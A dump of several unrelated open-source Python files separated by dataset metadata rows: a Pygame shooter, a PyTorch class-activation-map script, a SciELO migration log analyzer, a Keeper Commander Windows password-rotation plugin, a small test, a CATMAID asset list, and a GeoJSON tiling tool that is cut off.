    NOTE(review): the speed passed by ``PlayerSprite.fire`` (-15) is stored
    on ``self.speed`` but unused — the climb rate is hard-coded to 15 here.
    """

    def update(self):
        if self.rect.y > 0:
            self.rect.y -= 15
        if self.rect.y < 0:
            self.kill()
# --- One-time game setup: assets, audio, fonts, sprites ---
background = transform.scale(image.load('galaxy.jpg'),(700,500))
clock = time.Clock()
FPS = 60
mixer.init()
mixer.music.load('space.ogg')
mixer.music.play()
mfire = mixer.Sound('fire.ogg')
font.init()
font1 = font.SysFont('Arial', 18)  # HUD counters
font2 = font.SysFont('Arial', 75)  # win/lose banner
mc = PlayerSprite('rocket.png', 350, 425, 65, 65, 10)
enemies = sprite.Group()
for enemy in range(5):
    enemy = ЕnemySprite('ufo.png', randint(0,625), 0, 65, 65, 5)
    enemies.add(enemy)
bullets = sprite.Group()
game = True
# --- Main loop: draw, handle input, resolve collisions, check win/lose ---
while game:
    window.blit(background,(0,0))
    bullets.draw(window)
    bullets.update()
    mc.reset()
    enemies.draw(window)
    mc.update()
    enemies.update()
    for e in event.get():
        if e.type == QUIT:
            game = False
        if e.type == KEYDOWN:
            if e.key == K_SPACE:
                mc.fire()
    # Bullets destroy enemies; enemies touching the player end the game.
    sprites_list1 = sprite.groupcollide(enemies, bullets, True, True)
    sprites_list2 = sprite.spritecollide(mc, enemies, False)
    text_lose = font1.render("Пропущено: " + str(lost), 1, (255,255,255))
    text_win = font1.render("Сбито: " + str(c), 1, (255,255,255))
    for enemy in range(len(sprites_list1)):
        # Respawn one enemy per kill and bump the score.
        enemy = ЕnemySprite('ufo.png', randint(0,625), 0, 65, 65, 5)
        enemies.add(enemy)
        c += 1
    if c == 3:
        win = font2.render("Победа!", 1, (255,255,255))
        window.blit(win, (150, 250))
        game = False
    if lost >= 3 or len(sprites_list2) >= 1:
        lose = font2.render("Поражение" , 1, (255,255,255))
        window.blit(lose, (80, 250))
        game = False
    window.blit(text_lose, (500, 40))
    window.blit(text_win, (500, 80))
    display.update()
    clock.tick(FPS)
| 27.827273 | 91 | 0.587716 | 1,233 | 0.397999 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.05552 |
e2e63f122a8263e057c7c5f1b88e244fdf783447 | 5,948 | py | Python | test_action40.py | gmayday1997/pytorch_CAM | c51a0c7f7701005b8f031ed9a0f9b3b9680cf560 | [
"MIT"
] | 23 | 2018-02-13T00:50:11.000Z | 2021-02-04T01:49:34.000Z | test_action40.py | gmayday1997/pytorch-CAM | c51a0c7f7701005b8f031ed9a0f9b3b9680cf560 | [
"MIT"
] | null | null | null | test_action40.py | gmayday1997/pytorch-CAM | c51a0c7f7701005b8f031ed9a0f9b3b9680cf560 | [
"MIT"
] | 5 | 2017-12-19T10:48:22.000Z | 2021-02-04T01:49:35.000Z | import os
import numpy as np
import torch
import torch.nn as nn
import torchvision
import torch.utils.data as Data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
from torch.autograd import Variable
from torch.nn import functional as F
from action40_config import config
import vgg16_model as models
import utils as utils
import fold as imgfolder
import transforms as trans
import shutil
import cv2
import json
import matplotlib.pyplot as plt
import collections
configs = config()  # global experiment configuration (paths, batch size, ...)
resume = 1  # NOTE(review): appears unused in this script — confirm before removing
def parse_json(file_path):
    """Load and return the JSON document stored at *file_path*.

    Bug fix: the previous version used the Python 2 ``file`` builtin (a
    ``NameError`` on Python 3) and never closed the handle; ``with open``
    is the correct Python 3 equivalent.
    """
    with open(file_path) as json_file:
        return json.load(json_file)
######## adapted from the official CAM implementation ###############
def returnCAM(feature_conv, weight_softmax, class_idx, probs):
    """Generate class activation maps, upsampled to 256x256.

    Args:
        feature_conv: conv feature maps of shape (bz, nc, h, w).
        weight_softmax: classifier weights, one row per class.
        class_idx: class indices to generate maps for.
        probs: matching probabilities (kept for interface compatibility;
            iteration is truncated to the shorter of the two sequences,
            as before).

    Returns:
        List of uint8 CAM images (one per class index).

    Cleanup: the original also built ``output_cam``/``output_cam_prob``
    dicts that were never returned or read — that dead code is removed.
    """
    size_upsample = (256, 256)
    bz, nc, h, w = feature_conv.shape
    output_cam_imgs = []
    for idx, _prob in zip(class_idx, probs):
        # Weighted sum of the feature maps for this class, then normalize
        # to the 0-255 uint8 range.
        cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h * w)))
        cam = cam.reshape(h, w)
        cam = cam - np.min(cam)
        cam_img = np.uint8(255 * (cam / np.max(cam)))
        output_cam_imgs.append(cv2.resize(cam_img, size_upsample))
    return output_cam_imgs
def untransform(transform_img):
    """Invert the normalize+CHW transform: return an HWC BGR uint8 image.

    Bug fix: the previous in-place ``*=``/``+=`` operations were applied to
    a transpose *view*, silently mutating the caller's array; this version
    works on a copy and leaves the input untouched.
    """
    img = transform_img.transpose(1, 2, 0).copy()
    img *= [0.229, 0.224, 0.225]       # undo std normalization
    img += [0.4001, 0.4401, 0.4687]    # undo mean normalization
    img = (img * 255).astype(np.uint8)
    return img[:, :, ::-1]             # RGB -> BGR for OpenCV display
def test(net, testloader):
    """Evaluate *net* on *testloader*; print and return top-1 accuracy (%).

    NOTE(review): requires CUDA; ``Variable(..., volatile=True)`` is the
    legacy pre-0.4 PyTorch inference idiom.
    """
    net.eval()
    correct = 0
    total = 0
    for batch_idx, (inputs, targets) in enumerate(testloader):
        inputs, targets = inputs.cuda(), targets.cuda()
        inputs, targets = Variable(inputs, volatile=True), Variable(targets)
        outputs, _ = net(inputs)
        _, predicted = torch.max(outputs.data, 1)
        total += targets.size(0)
        correct += predicted.eq(targets.data).cpu().sum()
        # Disabled progress output, kept as-is (string-literal no-op).
        '''''''''
        progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
        % (test_loss/(batch_idx+1), 100.*correct/total, correct, total))
        '''''''''
    print(100.* correct/total)
    return 100.*correct/total
def main():
    """Run CAM inference over the Action-40 test set and save visualizations.

    Loads the fine-tuned VGG-CAM checkpoint, hooks its last conv block to
    capture feature maps, and for every test image saves a figure with the
    original picture plus the top-5 class activation maps.

    Bug fix: ``print batch_idx`` was Python 2 statement syntax (a
    SyntaxError under Python 3); it is now a function call.
    """
    ######## load training data ########
    ######### action 40 ############
    normalize = trans.Normalize(mean=[0.4001, 0.4401, 0.4687],
                                std=[0.229, 0.224, 0.225])
    transform = trans.Compose([
        trans.Scale((224,224)),
        trans.ToTensor(),
        normalize,
    ])
    test_data = imgfolder.ImageFolder(os.path.join(configs.data_dir,'img/test'),transform=transform)
    test_loader = Data.DataLoader(test_data,batch_size=configs.batch_size,
                                  shuffle= False, num_workers= 4, pin_memory= True)
    # Map class index -> human-readable class name.
    classes = {int(key): value for (key, value)
               in parse_json(configs.class_info_dir).items()}
    ######### build vgg model ##########
    vgg_cam = models.vgg_cam()
    vgg_cam = vgg_cam.cuda()
    checkpoint = torch.load(configs.best_ckpt_dir)
    vgg_cam.load_state_dict(checkpoint['state_dict'])
    # hook the feature extractor: capture the conv feature maps on forward.
    features_blobs = []
    def hook_feature(module, input, output):
        features_blobs.append(output.data.cpu().numpy())
    finalconv_name = 'classifier'  # this is the last conv layer of the network
    vgg_cam._modules.get(finalconv_name).register_forward_hook(hook_feature)
    # get the softmax weight
    params = list(vgg_cam.parameters())
    weight_softmax = np.squeeze(params[-1].data.cpu().numpy())
    save_cam_dir = os.path.join(configs.py_dir,'predict')
    if not os.path.exists(save_cam_dir):
        os.mkdir(save_cam_dir)
    top_number = 5
    correct = 0
    total = 0
    for batch_idx, (inputs, targets) in enumerate(test_loader):
        inputs, targets = inputs.cuda(), targets.cuda()
        transformed_img = inputs.cpu().numpy()[0]
        target_name = classes[targets.cpu().numpy()[0]]
        transformed_img = untransform(transformed_img)
        inputs, targets = Variable(inputs, volatile=True), Variable(targets)
        outputs, _ = vgg_cam(inputs)
        _, predicted = torch.max(outputs.data, 1)
        total += targets.size(0)
        correct += predicted.eq(targets.data).cpu().sum()
        # Top-5 predictions for the CAM panels.
        h_x = F.softmax(outputs).data.squeeze()
        probs, idx = h_x.sort(0, True)
        prob = probs.cpu().numpy()[:top_number]
        idx_ = idx.cpu().numpy()[:top_number]
        OUT_CAM = returnCAM(features_blobs[-1],weight_softmax,idx_,prob)
        save_fig_dir = os.path.join(save_cam_dir, 'cam_' + str(batch_idx) + '.jpg')
        plt.figure(1, figsize=(8, 6))
        ax = plt.subplot(231)
        img1 = transformed_img[:, :, (2, 1, 0)]
        ax.set_title(('{}').format(target_name),fontsize=14)
        ax.imshow(img1)
        for b_index, (idx,prob_in,cam) in enumerate(zip(idx_,prob,OUT_CAM)):
            cl = str(classes[idx])
            #save_fig_dir1 = os.path.join(save_cam_dir, 'cam_cv_' + str(batch_idx) + '_' + cl + '.jpg')
            # Overlay the CAM heatmap on the original image (70/30 blend).
            height, width, _ = transformed_img.shape
            heatmap = cv2.applyColorMap(cv2.resize(cam, (width, height)), cv2.COLORMAP_JET)
            result = heatmap * 0.3 + transformed_img * 0.7
            ax = plt.subplot(2,3,b_index+2)
            ax.imshow(result.astype(np.uint8)[:,:,(2,1,0)])
            ax.set_title(('{}:{}').format(cl,('%.3f' % prob_in)), fontsize=8)
        plt.savefig(save_fig_dir)
        print(batch_idx)
    print(100.* correct/total)
if __name__ == '__main__':
main()
| 33.41573 | 102 | 0.643746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 772 | 0.129792 |
e2e756023d59577863134604eb0ec0b5c6d80f25 | 15,627 | py | Python | scripts/loggeranalyzer.py | patymori/document-store-migracao | 1320ef58de1484ca8383c29c1fea55c4b2d89e67 | [
"BSD-2-Clause"
] | 1 | 2019-11-21T12:35:36.000Z | 2019-11-21T12:35:36.000Z | scripts/loggeranalyzer.py | patymori/document-store-migracao | 1320ef58de1484ca8383c29c1fea55c4b2d89e67 | [
"BSD-2-Clause"
] | 336 | 2019-04-01T14:06:37.000Z | 2022-03-21T22:16:55.000Z | scripts/loggeranalyzer.py | patymori/document-store-migracao | 1320ef58de1484ca8383c29c1fea55c4b2d89e67 | [
"BSD-2-Clause"
] | 4 | 2019-03-28T13:32:04.000Z | 2020-04-17T18:03:19.000Z | # Coding: utf-8
"""Script para analisar, agrupar dados provenientes dos logs da ferramenta
de migração das coleções SciELO."""
import argparse
import functools
import json
import logging
import re
import sys
from enum import Enum
from io import TextIOWrapper, IOBase
from typing import Callable, Dict, List, Optional, Union
import click
LOGGER_FORMAT = u"%(asctime)s %(levelname)-5.5s [%(name)s] %(message)s"
LOGGER = logging.getLogger(__name__)
class ErrorEnum(Enum):
    """Names used to classify migration-log errors in the output.

    Members:
        RESOURCE_NOT_FOUND: an asset or rendition is missing during packing.
        NOT_UPDATED: the XML could not be updated (usually lxml errors).
        XML_NOT_FOUND: an XML document is missing during packing.
        MISSING_METADATA: a metadata field is absent from the CSV used to
            update the XML.
        MISSING_MANIFEST: the package has no manifest file.
        XML_PARSER_ERROR: the XML could not be parsed.
        BUNDLE_NOT_FOUND: no bundle exists for the document.
        ISSN_NOT_FOUND: the document carries no ISSN.
        PACKAGE_NOT_IMPORTED: the package failed to import for any reason.
    """
    RESOURCE_NOT_FOUND = "resource-not-found"
    NOT_UPDATED = "xml-not-update"
    XML_NOT_FOUND = "xml-not-found"
    MISSING_METADATA = "missing-metadata"
    MISSING_MANIFEST = "missing-manifest"
    XML_PARSER_ERROR = "xml-parser-error"
    BUNDLE_NOT_FOUND = "bundle-not-found"
    ISSN_NOT_FOUND = "issn-not-found"
    PACKAGE_NOT_IMPORTED = "package-not-import"
class LoggerAnalyzer(object):
def __init__(self, in_file, out_file=None, log_format=None, out_formatter=None):
    """Hold the input/output handles and the expected log-line layout."""
    self.in_file = in_file
    self.out_file = out_file
    self.content = ""
    self.out_formatter = self.set_formatter(out_formatter)
    if log_format:
        self.log_format = log_format
    else:
        self.log_format = "<date> <time> <level> <module> <message>"
@classmethod
def formatters(cls) -> Optional[Dict]:
    """Known output-format names mapped to their formatter callables."""
    return dict(jsonl=cls.json_formatter)
def logformat_regex(self) -> (List[str], re.Pattern):
    """Build a regex that splits a log line according to ``self.log_format``.

    The format is a template such as ``"<date> <time> <level> <module>
    <message>"``; each ``<name>`` becomes a named capture group and each
    run of spaces becomes ``\\s+``.

    Returns:
        (headers, regex): the field names, and the compiled pattern, e.g.::

            re.compile('^(?P<date>.*?)\\s+(?P<time>.*?)...(?P<message>.*?)$')
    """
    headers = []
    pattern = ""
    pieces = re.split(r"(<[^<>]+>)", self.log_format)
    for index, piece in enumerate(pieces):
        if index % 2:
            # Odd pieces are the "<name>" placeholders.
            field = piece.strip("<").strip(">")
            headers.append(field)
            pattern += "(?P<%s>.*?)" % field
        else:
            # Even pieces are literal separators; spaces match any run of
            # whitespace.
            pattern += re.sub(" +", r"\\s+", piece)
    return headers, re.compile("^" + pattern + "$")
def load(self) -> None:
    """Read the input file into ``self.content`` as a list of lines.

    Only reads when ``self.in_file`` is a file-like object (IOBase);
    otherwise ``self.content`` keeps its previous value.
    """
    if isinstance(self.in_file, IOBase):
        self.content = self.in_file.readlines()
def parse(self, format=None) -> None:
    """Abstract hook: subclasses run the analysis (load -> tokenize -> dump)."""
    raise NotImplementedError("Uma instância de LoggerAnalyzer deve implementar o método parse.")
def parser(
    self, line: str, regex: re.Pattern, error: ErrorEnum, group: str = None
) -> Optional[Dict]:
    """Match *line* against *regex* and tag the captured fields.

    Args:
        line: the log-message text to analyse.
        regex: the pattern whose named groups describe the error.
        error: an :class:`ErrorEnum` member classifying the error.
        group: optional aggregation label for the error.

    Returns:
        The named captures merged with the ``error``/``group`` labels, e.g.::

            {'pid': 'S0066-782X2020000500001',
             'uri': 'bases/pdf/abc/v114n4s1/pt_0066-782X-abc-20180130.pdf',
             'xml': '0066-782X-abc-20180130.xml',
             'error': 'resource-not-found',
             'group': 'renditions'}

        or ``None`` when the line does not match.
    """
    found = regex.match(line)
    if found is None:
        return None
    captured = found.groupdict()
    return dict(captured, **{"error": error.value, "group": group})
def tokenize(
    self, extra_parsers: List[Callable] = None
) -> List[Optional[Dict]]:
    """Split every loaded log line into a semantically-tagged dict.

    Each line is first matched against the general layout built from
    ``self.log_format``; its ``message`` field is then tried against each
    entry of *extra_parsers* (dicts with ``regex``/``error`` and an
    optional ``group`` key) until one matches.

    Errors carrying a ``pid`` are aggregated per document — one dict per
    PID, with the matching URIs appended under their group; all other
    errors are appended individually.

    Example entry of the returned list::

        {'assets': ['imagem.tif'], 'pid': 'S1981-38212017000200203',
         'error': 'resource'}
    """
    errors: List[Optional[Dict]] = []
    documents_errors: Dict[str, Dict] = {}
    for line in self.content:
        line = line.strip()
        _, regex = self.logformat_regex()
        match = regex.match(line)
        if match:
            format_dict = match.groupdict()
            for params in extra_parsers:
                data = self.parser(format_dict['message'], **params)
                if data is not None:
                    pid: Optional[str] = data.get("pid")
                    error: ErrorEnum = data.get("error")
                    uri: Optional[str] = data.get("uri")
                    level: Optional[str] = format_dict.get("level")
                    time: Optional[str] = format_dict.get("time")
                    date: Optional[str] = format_dict.get("date")
                    # NOTE(review): 'exception' is captured but never used.
                    exception: Optional[str] = format_dict.get("exception")
                    group = data.pop("group", error)
                    if pid is not None:
                        # Aggregate by document: URIs accumulate per group.
                        documents_errors.setdefault(pid, {})
                        documents_errors[pid].setdefault(group, [])
                        documents_errors[pid][group].append(uri)
                        documents_errors[pid]["pid"] = pid
                        documents_errors[pid]["error"] = error
                        documents_errors[pid]["level"] = level
                        documents_errors[pid]["time"] = time
                        documents_errors[pid]["date"] = date
                    elif error != ErrorEnum.RESOURCE_NOT_FOUND:
                        data["level"] = level
                        data["time"] = time
                        data["date"] = date
                        errors.append(data)
                    break
            else:
                # Line matched the log layout but no packing-error pattern.
                LOGGER.debug(
                    "Não foi possível analisar a linha '%s', talvez seja necessário especificar um analisador.",
                    line,
                )
    documents_errors_values = list(documents_errors.values())
    errors.extend(documents_errors_values)
    return errors
def dump(self, lines) -> None:
    """Write each already-formatted line to the output handle.

    The output handle must implement the text-stream interface
    (``TextIOWrapper``); every entry is newline-terminated.
    """
    for entry in lines:
        self.out_file.write(entry)
        self.out_file.write("\n")
def json_formatter(self, errors: List[Optional[Dict]]) -> List[str]:
    """Serialize each parsed-error dict to one JSON string (jsonl output).

    Example output lines::

        {"uri": "jbn/nahead/2175-8239-jbn-2019-0218.xml", "error": "xml-not-found"}
        {"uri": "jbn/nahead/2175-8239-jbn-2020-0025.xml", "error": "xml-not-found"}
    """
    return [json.dumps(entry) for entry in errors]
def set_formatter(self, format) -> Callable:
    """Resolve *format* to a bound formatter method (default: jsonl).

    Bug fix: ``formatters()`` stores plain functions taken from the class,
    so the previous lookup returned an *unbound* function for known format
    names ("jsonl"); calling it with a single argument then raised
    TypeError. Only the fallback path (``self.json_formatter``) was bound.
    Binding the resolved function to ``self`` makes both paths callable
    the same way.
    """
    formatter = self.formatters().get(format, LoggerAnalyzer.json_formatter)
    # Bind the plain function to this instance via the descriptor protocol.
    return formatter.__get__(self, type(self))
class AnalyzerImport(LoggerAnalyzer):
    """Analyzer for the *import* step of the migration logs."""

    # IMPORT_REGEX
    manifest_not_found = re.compile(
        r".*No such file or directory: '(?P<file_path>[^']+)'",
        re.IGNORECASE,
    )
    xml_not_into_package = re.compile(
        r".*There is no XML file into package '(?P<package_path>[^']+)",
        re.IGNORECASE,
    )
    xml_parser_error = re.compile(
        r".*Could not parse the '(?P<file_path>[^']+)' file",
        re.IGNORECASE,
    )
    bundle_not_found = re.compile(
        r".*The bundle '(?P<bundle>[^']+)' was not updated.",
        re.IGNORECASE,
    )
    issn_not_found = re.compile(
        r".*No ISSN in document '(?P<pid>[^']+)'",
        re.IGNORECASE,
    )
    package_not_imported = re.compile(
        r".*Could not import package '(?P<package_path>[^']+).*'",
        re.IGNORECASE,
    )

    def parse(self, format=None) -> None:
        """Load the log, tokenize it with the import-step patterns, and dump
        the formatted result to the output file.
        """
        known_errors = [
            {"regex": self.manifest_not_found, "error": ErrorEnum.MISSING_MANIFEST},
            {"regex": self.xml_not_into_package, "error": ErrorEnum.XML_NOT_FOUND},
            {"regex": self.xml_parser_error, "error": ErrorEnum.XML_PARSER_ERROR},
            {"regex": self.bundle_not_found, "error": ErrorEnum.BUNDLE_NOT_FOUND},
            {"regex": self.issn_not_found, "error": ErrorEnum.ISSN_NOT_FOUND},
            {"regex": self.package_not_imported, "error": ErrorEnum.PACKAGE_NOT_IMPORTED},
        ]
        self.load()
        render = self.set_formatter(format)
        parsed = self.tokenize(extra_parsers=known_errors)
        self.dump(render(parsed))
class AnalyzerPack(LoggerAnalyzer):
    """Analyzer for the *packing* (package-from-site) step log of the DSM migration."""

    # Packing-step error patterns; named groups capture pid/uri/xml/etc.
    asset_not_found_regex = re.compile(
        r".*\[(?P<pid>S\d{4}-.*)\].*Could not find asset "
        r"'(?P<uri>[^']+)'.*'(?P<xml>[^']+)'.?$",
        re.IGNORECASE,
    )
    rendition_not_found_regex = re.compile(
        r".*\[(?P<pid>S\d{4}-.*)\].*Could not find rendition "
        r"'(?P<uri>[^']+)'.*'(?P<xml>[^']+)'.?$",
        re.IGNORECASE,
    )
    xml_not_found_regex = re.compile(
        r".*Could not find the XML file '(?P<uri>[^']+)'.?", re.IGNORECASE
    )
    xml_not_updated_regex = re.compile(
        r".*Could not update xml '(?P<uri>[^']+)'.?"
        r"( The exception '(?P<exception>[^']+)')?",
        re.IGNORECASE,
    )
    xml_missing_metadata_regex = re.compile(
        r".*Missing \"(?P<metadata>[\w\s]+)\".* \"(?P<uri>[^']+)\"", re.IGNORECASE
    )

    def parse(self, format=None) -> None:
        """Run the packing-step analysis.

        Loads the log, tokenizes it with the regex rules above, renders
        the tokens with the formatter named by *format* (falling back to
        the default) and writes the result out.

        Args:
            format: name of the output format to use.

        Returns None; does not raise.
        """
        rules = [
            {
                "regex": self.asset_not_found_regex,
                "error": ErrorEnum.RESOURCE_NOT_FOUND,
                "group": "renditions",
            },
            {
                "regex": self.rendition_not_found_regex,
                "error": ErrorEnum.RESOURCE_NOT_FOUND,
                "group": "renditions",
            },
            {"regex": self.xml_not_updated_regex, "error": ErrorEnum.NOT_UPDATED},
            {"regex": self.xml_not_found_regex, "error": ErrorEnum.XML_NOT_FOUND},
            {"regex": self.xml_missing_metadata_regex, "error": ErrorEnum.MISSING_METADATA},
        ]
        self.load()
        render = self.set_formatter(format)
        self.dump(render(self.tokenize(extra_parsers=rules)))
@click.command()
@click.argument("input", type=click.File("r"), required=True)
@click.option(
    "-f",
    "--formatter",
    default="jsonl",
    type=click.Choice(LoggerAnalyzer.formatters().keys()),
    help="Escolha um formato de conversão para o analisador",
)
@click.option(
    "-s",
    "--step",
    required=True,
    type=click.Choice(['pack', 'import']),
    help="Escolha o passo que deseja analisar",
)
@click.option(
    "--log_format",
    default="<date> <time> <level> <module> <message>",
    type=click.STRING,
    help="Define o formato do log. Padrão: <date> <time> <level> <module> <message>.",
)
@click.option(
    "--log_level",
    default="WARNING",
    type=click.Choice(["NOTSET", "DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]),
    help="Defini o nível de log de excecução. Padrão WARNING.",
)
@click.argument("output", type=click.File("w"), required=False)
def main(input, step, formatter, log_format, output, log_level):
    """
    Document Store Migration (DSM) - Log Analyzer

    Reads the log files from the packing and import phases of the DSM
    article migration.

    The final result of this analyzer is a JSONL file that lets us run
    more expressive queries over the logs.
    """
    # Configure root logging before any analyzer work happens.
    logging.basicConfig(format=LOGGER_FORMAT, level=getattr(logging, log_level.upper()))
    # OUTPUT is an optional click argument; default to stdout so the
    # tool can be used in a pipeline.
    if not output:
        output = sys.stdout
    # Dispatch to the analyzer matching the chosen pipeline step
    # (click.Choice guarantees step is 'pack' or 'import').
    if step == 'pack':
        parser = AnalyzerPack(input, output, log_format, out_formatter=formatter)
        parser.parse()
    elif step == 'import':
        parser = AnalyzerImport(input, output, log_format, out_formatter=formatter)
        parser.parse()
if __name__ == "__main__":
    main()  # CLI entry point; argument parsing is handled by click
| 32.488565 | 112 | 0.568823 | 13,554 | 0.86008 | 0 | 0 | 1,796 | 0.113967 | 0 | 0 | 7,744 | 0.491402 |
e2e7e55d22649bca4fb42e3ec2dfab9577ef8761 | 786 | py | Python | keepercommander/plugins/windows/windows.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | 151 | 2015-11-02T02:04:46.000Z | 2022-01-20T00:07:01.000Z | keepercommander/plugins/windows/windows.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | 145 | 2015-12-31T00:11:35.000Z | 2022-03-31T19:13:54.000Z | keepercommander/plugins/windows/windows.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | 73 | 2015-10-30T00:53:10.000Z | 2022-03-30T03:50:53.000Z | # -*- coding: utf-8 -*-
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Copyright 2015 Keeper Security Inc.
# Contact: ops@keepersecurity.com
#
import logging
import subprocess
import re
def rotate(record, newpassword):
    """Rotate a local Windows account password using ``net user``.

    Args:
        record: Keeper record; only ``record.login`` is read, and
            ``record.password`` is updated on success.
        newpassword: the new password to set.

    Returns:
        True when ``net user`` exits with status 0 (password changed),
        False otherwise.
    """
    # NOTE(review): the password is passed on the command line, so it can be
    # visible in process listings while the command runs.
    i = subprocess.call(["net", "user", record.login, newpassword], shell=True)
    if i == 0:
        logging.info('Password changed successfully')
        record.password = newpassword
        return True
    logging.error('Password change failed')
    # Bug fix: this path previously returned True even though `net user`
    # failed, making callers believe the rotation succeeded.
    return False
def adjust(newpassword):
    """Strip characters that interfere with the Windows command line.

    The removed characters are ``<``, ``>``, ``&`` and ``|``.
    """
    unsafe_chars = re.compile('[<>&|]')
    return unsafe_chars.sub('', newpassword)
| 22.457143 | 79 | 0.603053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 421 | 0.534943 |
e2e80352d380fdeb17dfc45676bbe0034a2b92a7 | 188 | py | Python | tests/twodim/test_synthetic.py | microprediction/punting | 5de62913f8eb9777df1d465db0f2d606a3d19c42 | [
"MIT"
] | null | null | null | tests/twodim/test_synthetic.py | microprediction/punting | 5de62913f8eb9777df1d465db0f2d606a3d19c42 | [
"MIT"
] | null | null | null | tests/twodim/test_synthetic.py | microprediction/punting | 5de62913f8eb9777df1d465db0f2d606a3d19c42 | [
"MIT"
] | null | null | null | from punting.twodim.twosynthetic import random_harville_market
def test_synthetic():
    """Smoke test: random_harville_market(n=7, scr=-1) should run without raising.

    NOTE(review): the result `m` is never asserted on, so this only guards
    against exceptions — consider adding assertions on the market's shape.
    """
    n = 7
    m = random_harville_market(n=n, scr=-1)
if __name__=='__main__':
test_synthetic() | 18.8 | 62 | 0.728723 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.053191 |
e2e85a1c47f7391da6709f39642b315c415006ac | 488 | py | Python | synapsesuggestor/pipelinefiles.py | clbarnes/CATMAID-synapsesuggestor | 7b9ffd96c034ca47a6567ebbeb0eff4ece44cb33 | [
"MIT"
] | 3 | 2017-07-27T20:33:14.000Z | 2018-11-09T11:14:24.000Z | synapsesuggestor/pipelinefiles.py | clbarnes/CATMAID-synapsesuggestor | 7b9ffd96c034ca47a6567ebbeb0eff4ece44cb33 | [
"MIT"
] | 10 | 2017-09-29T14:43:32.000Z | 2018-11-13T19:19:22.000Z | synapsesuggestor/pipelinefiles.py | clbarnes/CATMAID-synapsesuggestor | 7b9ffd96c034ca47a6567ebbeb0eff4ece44cb33 | [
"MIT"
] | 1 | 2018-06-15T19:12:55.000Z | 2018-06-15T19:12:55.000Z | # -*- coding: utf-8 -*-
"""Specifies static assets (CSS, JS) required by the CATMAID front-end.

This module specifies all the static files that are required by the
synapsesuggestor front-end.
"""
# Fix: the docstring previously came *after* the __future__ import, so it
# was a plain string statement and the module's __doc__ stayed empty.
# A docstring is the only statement allowed before a __future__ import.
from __future__ import unicode_literals

from collections import OrderedDict

# Pipeline definition consumed by the front-end asset collector: maps a
# bundle name to its input files and the compiled output filename.
JAVASCRIPT = OrderedDict()
JAVASCRIPT['synapsesuggestor'] = {
    'source_filenames': (
        'synapsesuggestor/js/widgets/synapse-detection-table.js',
    ),
    'output_filename': 'js/synapsesuggestor.js'
}
| 24.4 | 71 | 0.733607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 328 | 0.672131 |
e2e89b4c74cc43eb212301d0985561c61c01688a | 3,019 | py | Python | code/tile/tile_geojson.py | kylebarron/transit-land-dump | 56114a21e4cb6edaaadc0bb220f883cf71288997 | [
"MIT"
] | 21 | 2020-02-09T08:18:16.000Z | 2022-01-07T23:38:33.000Z | code/tile/tile_geojson.py | kylebarron/all-trans | 56114a21e4cb6edaaadc0bb220f883cf71288997 | [
"MIT"
] | 49 | 2020-02-08T21:57:19.000Z | 2020-03-02T18:57:14.000Z | code/tile/tile_geojson.py | kylebarron/transit-land-dump | 56114a21e4cb6edaaadc0bb220f883cf71288997 | [
"MIT"
] | 1 | 2021-02-23T21:53:00.000Z | 2021-02-23T21:53:00.000Z | from pathlib import Path
import click
import cligj
import geojson
import mercantile
from shapely.geometry import asShape, box
from shapely.ops import split
@click.command()
@cligj.features_in_arg
@click.option(
    '-z',
    '--min-zoom',
    type=int,
    required=True,
    help='Min zoom level to create tiles for',
)
@click.option(
    '-Z',
    '--max-zoom',
    type=int,
    required=True,
    help='Max zoom level to create tiles for (inclusive)',
)
@click.option(
    '-d',
    '--tile-dir',
    type=click.Path(file_okay=False, dir_okay=True, writable=True))
@click.option(
    '--allowed-geom-type',
    type=str,
    required=False,
    multiple=True,
    default=[],
    help='Geometry types to keep in exported GeoJSON features.')
def cut_geojson(features, min_zoom, max_zoom, tile_dir, allowed_geom_type):
    """Cut GeoJSON features into xyz tiles
    """
    # Valid GeoJSON geometry type names — used only to validate the
    # --allowed-geom-type option values.
    geometry_types = [
        'Point', 'MultiPoint', 'LineString', 'MultiLineString', 'Polygon',
        'MultiPolygon']
    if not all(t in geometry_types for t in allowed_geom_type):
        raise ValueError(f'allowed_geom_type must be one of: {geometry_types}')
    tile_dir = Path(tile_dir)
    for feature in features:
        geometry = asShape(feature['geometry'])
        # Tiles across all requested zooms whose bounds intersect the feature.
        tiles = find_tiles(geometry, min_zoom, max_zoom)
        for tile in tiles:
            # Pieces of the feature geometry that fall inside this tile.
            clipped_geometries = clip_geometry_to_tile(geometry, tile)
            new_features = []
            for clipped_geometry in clipped_geometries:
                # Optionally drop pieces whose geometry type is not allowed
                # (clipping can change the type, e.g. Polygon -> LineString).
                if allowed_geom_type:
                    geom_type = clipped_geometry.type
                    if geom_type not in allowed_geom_type:
                        print(f'Skipping feature of type: {geom_type}')
                        continue
                new_features.append(
                    geojson.Feature(
                        geometry=clipped_geometry,
                        properties=feature['properties']))
            # Write feature to tile_dir as newline-delimited GeoJSON under
            # <tile_dir>/<z>/<x>/<y>.geojson. Opened in append mode on
            # purpose: several input features can land in the same tile.
            this_tile_dir = (tile_dir / str(tile.z) / str(tile.x))
            this_tile_dir.mkdir(parents=True, exist_ok=True)
            with open(this_tile_dir / f'{str(tile.y)}.geojson', 'a') as f:
                for new_feature in new_features:
                    f.write(geojson.dumps(new_feature, separators=(',', ':')))
                    f.write('\n')
def find_tiles(geometry, min_zoom, max_zoom):
    """Return the tiles between min_zoom and max_zoom (inclusive) whose
    web-mercator bounds intersect *geometry*.
    """
    assert min_zoom <= max_zoom, 'min zoom must be <= max zoom'
    candidates = mercantile.tiles(
        *geometry.bounds, zooms=range(min_zoom, max_zoom + 1))
    return [
        tile for tile in candidates
